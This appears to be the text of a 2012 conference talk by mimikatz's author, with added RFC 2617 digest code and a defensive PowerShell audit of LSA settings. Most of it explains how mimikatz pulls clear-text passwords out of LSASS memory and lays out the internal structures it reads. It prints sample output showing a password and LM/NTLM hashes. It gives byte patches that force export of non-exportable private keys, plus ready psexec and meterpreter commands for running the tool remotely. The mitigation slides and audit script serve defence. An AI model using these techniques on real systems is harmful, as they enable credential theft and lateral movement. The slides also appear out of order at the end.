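def _md5_hex(*parts: str) -> str:
    """RFC 2617 H(a:b:...): MD5 over the colon-joined parts, lowercase hex."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def digest_ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is chosen by the server."""
    return _md5_hex(username, realm, password)


def digest_ha2(method: str, digest_uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (no entity-body hash)."""
    return _md5_hex(method, digest_uri)


def digest_response(username: str, realm: str, password: str, method: str,
                    digest_uri: str, nonce: str, nc: str, cnonce: str,
                    qop: str = "auth") -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2), the value in the Authorization header."""
    ha1 = digest_ha1(username, realm, password)
    ha2 = digest_ha2(method, digest_uri)
    return _md5_hex(ha1, nonce, nc, cnonce, qop, ha2)


def ha1_for_realms(username: str, password: str, realms: list[str]) -> dict[str, str]:
    """One HA1 per realm: each needs the password again, none derives from another.

    This is the storage problem WDigest faces: the realms of future servers are
    unknown at Windows logon, so only the password covers all of them.
    """
    return {realm: digest_ha1(username, realm, password) for realm in realms}


if __name__ == "__main__":
    # Public worked example from RFC 2617 section 3.5.
    resp = digest_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                           "GET", "/dir/index.html",
                           "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b")
    print("response =", resp)
    # Constructed realm names: three servers, three unrelated HA1 values.
    for realm, ha1 in ha1_for_realms("Mufasa", "Circle Of Life",
                                     ["testrealm@host.com", "intranet.example", "mail.example"]).items():
        print(f"{realm:22s} HA1 = {ha1}")
```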
mimikatz :: sekurlsa :: wdigest :: theory
This time we know
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– Hypothesis seems verified
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's search for it in WDigest
– SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the doubly linked list wdigest!l_LogSessList

.text:7409D151 _DigestCalcHA1@8          call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID → search the linked list wdigest!l_LogSessList for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear]

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, I've only used a logical (empirical) approach to search for passwords…
– Protocol reading
– Symbols searching
~ Boring ~… let's be more brutal this time: set a WinDbg trap

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context to be switched. When the debugger breaks in again, you will be in the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp / how?

Let's log in with a Live account on Windows 8.
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).

Stacks caught by the LsaProtectMemory trap (kc 5):

lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2
    <- our LiveSSP provider

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials
    <- yeah! Pass the Hash capability with a Live account too…

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
    <- a Live user can log on through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  [...]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
mimikatz :: sekurlsa :: livessp / workflow

LsaEnumerateLogonSessions
  -> for each LUID: search the linked list livessp!LiveGlobalLogonSessionList for that LUID
  -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL
  -> LsaUnprotectMemory on the Password field
  -> password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account.
After credential protection, KerbCreateLogonSession calls
- NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

Stacks caught by the LsaProtectMemory trap (kc 5):

lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
    <- Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
    <- Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) / workflow

LsaEnumerateLogonSessions
  -> for each LUID: RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable
  -> KIWI_KERBEROS_PRIMARY_CREDENTIAL
  -> LsaUnprotectMemory on the Password field
  -> password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) / workflow

LsaEnumerateLogonSessions
  -> for each LUID: search the linked list kerberos!KerbLogonSessionList for that LUID
  -> KIWI_KERBEROS_LOGON_SESSION
  -> LsaUnprotectMemory on the Password field
  -> password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa / demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos / "hu?"

Ok, it works… but why?
Not for all logons on NT5 (it can need an unlock).

From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol…
- all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
- for password auth
  • password hash as the shared secret, but the password is kept in memory
- for full smartcard auth
  • no password on the client
  • no hash on the client
  - NTLM hash on the client…
  - the KDC sent it back as a gift
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way (they have to be usable).
We used LsaUnprotectMemory in the LSASS context to decrypt them
- this function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.

Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too, and "imports" the keys LSASS initialized
- when we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory / NT5

Depending on the size of the secret, LsaEncryptMemory uses
- RC4
- DESx

Diagram: lsasrv globals inside lsass, copied… into the lsasrv.dll loaded by mimikatz
  g_cbRandomKey   DWORD (256)
  g_pRandomKey    BYTE[g_cbRandomKey]
  g_pDESXKey      BYTE[144]
  g_Feedback      BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory / NT6

Depending on the size of the secret, LsaEncryptMemory uses
- 3DES
- AES

Diagram: lsasrv globals inside lsass, copied… into the lsasrv.dll loaded by mimikatz
  InitializationVector   BYTE[16]
  h3DesKey               handle -> KIWI_BCRYPT_KEY -> cle -> KIWI_BCRYPT_KEY_DATA
  hAesKey                handle -> KIWI_BCRYPT_KEY -> cle -> KIWI_BCRYPT_KEY_DATA

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa / memo

Security Packages

  Package          Symbol(s)                                               Type
  tspkg            tspkg!TSGlobalCredTable                                 RTL_AVL_TABLE
  wdigest          wdigest!l_LogSessList                                   LIST_ENTRY
  livessp          livessp!LiveGlobalLogonSessionList                      LIST_ENTRY
  kerberos (nt5)   kerberos!KerbLogonSessionList                           LIST_ENTRY
  kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                    RTL_AVL_TABLE
  msv1_0           lsasrv!LogonSessionList, lsasrv!LogonSessionListCount   LIST_ENTRY, ULONG

Protection Keys

  NT 5   Key    Symbols
         RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
         DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

  NT 6   Key    Symbols
         (IV)   lsasrv!InitializationVector
         3DES   lsasrv!h3DesKey
         AES    lsasrv!hAesKey
mimikatz :: sekurlsa / memo

Some commands:
  mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp :
         n.t. (LUID KO)
mimikatz :: sekurlsa / what we can do?

Basics
- no physical access to the computer (first step to pass the hash, then pass the pass)
- no admin rights / system rights / debug privileges (…)
- disable local admin accounts
- strong passwords (haha, it was a joke, they are useless here ;))
- for privileged accounts, network logon instead of interactive (when possible)
- audit: pass the hash leaves traces and can lock accounts
- no admin rights / system rights / debug privileges, even for VIPs
- use a separate network (or forest) for privileged tasks

More in depth
- force strong authentication (SmartCard & Token) $ €
- short validity for Kerberos tickets
- no delegation
- disable NTLM (available with NT6)
- nothing exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
- stop shared secrets for authentication, push public/private stuff (like keys ;))
- take every opportunity to stop retro-compatibility
- disable faulty providers
  • is it supported by Microsoft?
  • even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
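One way to check a host against the "basics" above, as an added example (not from the slides and not part of mimikatz): a read-only PowerShell audit of the LSA settings behind them. The registry paths and value names are real Windows settings; UseLogonCredential (KB2871997, 2014) and RunAsPPL (Windows 8.1 / Server 2012 R2 and later) post-date this 2012 talk and are the later Microsoft answers to WDigest clear-text caching and to reading LSASS memory from an ordinary admin process. The wording of the findings is the script's own.

```powershell
# Added example (not from the slides, not part of mimikatz): read-only audit of
# the LSA settings behind the "basics" list. Run in an elevated PowerShell on
# the host to check. Registry paths and value names are real Windows settings;
# the wording of the findings is this script's own.

function Read-RegValue {
    # Return one registry value, or $null when the key or the value is absent.
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }
}

function Get-LsaCredentialExposure {
    $lsa     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $msv     = "$lsa\MSV1_0"
    $wdigest = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

    # 1. Providers LSASS loads at boot. Each one receives the clear password in
    #    SpAcceptCredentials (memo slide: tspkg, wdigest, livessp, kerberos,
    #    msv1_0), so any extra third-party entry deserves a look.
    $packages = @(Read-RegValue $lsa 'Security Packages')

    # 2. WDigest clear-text caching (UseLogonCredential, KB2871997, 2014):
    #    0 = WDigest no longer keeps the clear password in l_LogSessList.
    #    Absent = OS default: on for Windows 8 / 2012 and earlier, off from 8.1 / 2012 R2.
    $useLogonCred = Read-RegValue $wdigest 'UseLogonCredential'

    # 3. NTLM restrictions ("disable NTLM, available with NT6").
    $lmLevel = Read-RegValue $lsa 'LmCompatibilityLevel'        # 5 = NTLMv2 only, refuse LM and NTLM
    $ntlmOut = Read-RegValue $msv 'RestrictSendingNTLMTraffic'  # 2 = deny all outgoing NTLM

    # 4. LSASS as a protected process (RunAsPPL, Windows 8.1 / 2012 R2 and later):
    #    an ordinary admin process can no longer open LSASS to read its memory.
    $runAsPpl = Read-RegValue $lsa 'RunAsPPL'

    # 5. Who holds SeDebugPrivilege, the right every memory-reading path needs.
    #    secedit exports user rights as an INF; the line looks like
    #    "SeDebugPrivilege = *S-1-5-32-544" (Administrators).
    $inf = Join-Path $env:TEMP 'user_rights_audit.inf'
    secedit /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $line = Select-String -Path $inf -Pattern '^SeDebugPrivilege' | Select-Object -First 1
    Remove-Item $inf -ErrorAction SilentlyContinue
    $debugHolders = if ($line) { ($line.Line -split '=', 2)[1].Trim() }
                    else       { '(not set: defaults to Administrators)' }

    $findings = @(
        if ($useLogonCred -ne 0) { 'WDigest may keep clear passwords in LSASS: set UseLogonCredential = 0' }
        if ($runAsPpl -ne 1)     { 'LSASS is not a protected process: consider RunAsPPL = 1' }
        if (($null -eq $lmLevel) -or ($lmLevel -lt 5)) { 'LmCompatibilityLevel below 5: LM/NTLMv1 responses still allowed' }
        if ($line -and $debugHolders -ne '*S-1-5-32-544') { "SeDebugPrivilege held by: $debugHolders (expected Administrators only)" }
    )

    [PSCustomObject]@{
        SecurityPackages           = ($packages -join ', ')
        WDigestUseLogonCredential  = $useLogonCred
        LmCompatibilityLevel       = $lmLevel
        RestrictSendingNTLMTraffic = $ntlmOut
        LsassRunAsPPL              = $runAsPpl
        SeDebugPrivilegeHolders    = $debugHolders
        Findings                   = $findings
    }
}

Get-LsaCredentialExposure | Format-List
```

Run it elevated: secedit refuses to export user rights otherwise. On a domain member, compare the SeDebugPrivilege holders with what Group Policy assigns, and treat a Security Packages list longer than the five providers in the memo as something to explain, since every registered package gets the clear password at logon.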
mimikatz :: crypto / what is it?

A little module that I wrote to
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  • even those which are "not" exportable

What the crypto module can do
- list
  • providers
  • stores
  • certificates
  • keys
- export
  • certificates
    - public, in DER format
    - with private keys, in PFX format
  • private keys in PVK format (it's cool, OpenSSL can deal with it too)
- patch
  • CryptoAPI, in the mimikatz context
  • CNG, in the LSASS context (again ;))

Diagram: mod_mimikatz_crypto
mimikatz :: crypto / how it's protected?

Private keys are DPAPI protected
- you cannot reuse private key files on another computer
  • at least not without the master keys and/or the users' passwords
A computer/user can load its own keys because it has enough secrets to do it (ex: session opened)
- yes, a computer/server opens a "session"

Export/usage can be limited by
- a password
- a popup
  (a constraint for most users; unavailable for computer keys)
- the Export/Archive flag not being present

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi / how it works?

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." (source: http://technet.microsoft.com/library/cc962093.aspx)

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, … (cryptdll.dll, rsaenh.dll, …)
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi / how it's exported? (… level)

Diagram: export of a CryptoAPI / RSA CSP private key, everything inside the calling process
  Process -> CryptoAPI and RSA CSP
  Ask to export key -> Load private key (DPAPI decode) -> Exportable?
    yes -> exported key
    no  -> NTE_BAD_KEY_STATE
  (slide label on the in-process part: PLAYSKOOL)
mimikatz :: crypto :: patchcapi / because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi / because I own my process

So what? A module in my own process tells me I can't do something? CryptoAPI is in my memory space: let's patch it!
I wrote "4" bytes in my memory space

before:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
after:
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

before:
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
after:
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi / demo time

Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi / limitations

Because
- I'm lazy
- I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…

mimikatz crypto::patchcapi only deals with
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng / how it works?

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." (source: http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx)

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
- it is, but it's not perfect…
mimikatz :: crypto :: cng / how it's exported? (… level)

Diagram: export of a CNG private key; the key and the check live in the KeyIso service inside LSASS, not in the calling process
  Process -> CNG -> RPC -> KeyIso service (LSASS process)
  Ask to export key -> Load private key (DPAPI decode) -> Exportable?
    yes -> exported key (back over RPC)
    no  -> NTE_NOT_SUPPORTED
  LSASS on NT6: system protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP
  (slide label on the in-process part: PLAYSKOOL)
mimikatz :: crypto :: patchcng / because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

mimikatz # crypto::exportKeys [user]
Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng / because sometimes I own LSASS

This time, the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in the LSASS memory space…

before:
.text:6C815210 75 1C    jnz short continue_key_export
after:
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng / demo time

Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng / limitations

The patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM

mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz :: crypto :: patchcng / bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until a reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
- yeah, like the good old certutil

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:

    mimikatz crypto::patchcapi crypto::exportCertificates exit
    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
    mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts / computers – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List notifications (process, thread, image, registry)
– List objects, hooks and procedures
– …
…
mimikatz :: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduced SSO capability for Terminal Server with NT 6 to improve the RemoteApp and Remote Desktop user experience
– http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= account delegation)
– Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
– User does not have to type their password
– Password is not in the RDP file
– Password is not in user secrets
mimikatz :: sekurlsa :: tspkg :: questions
The KB says that for it to work we must enable « Default credentials » delegation
– "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  • What? Our User/Domain/Password? Hash? Ticket? It seems…
– In all cases the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
– 2.2.1.2.1 TSPasswordCreds
  • "The TSPasswordCreds structure contains the user's password credentials that are delegated to the server" (or PIN)

    TSPasswordCreds ::= SEQUENCE {
        domainName  [0] OCTET STRING,
        userName    [1] OCTET STRING,
        password    [2] OCTET STRING
    }

– Challenge/response for authentication?
  • Server: YES (TLS, Kerberos)
  • Client: NO, the password is sent to the server…
So the password resides somewhere in memory
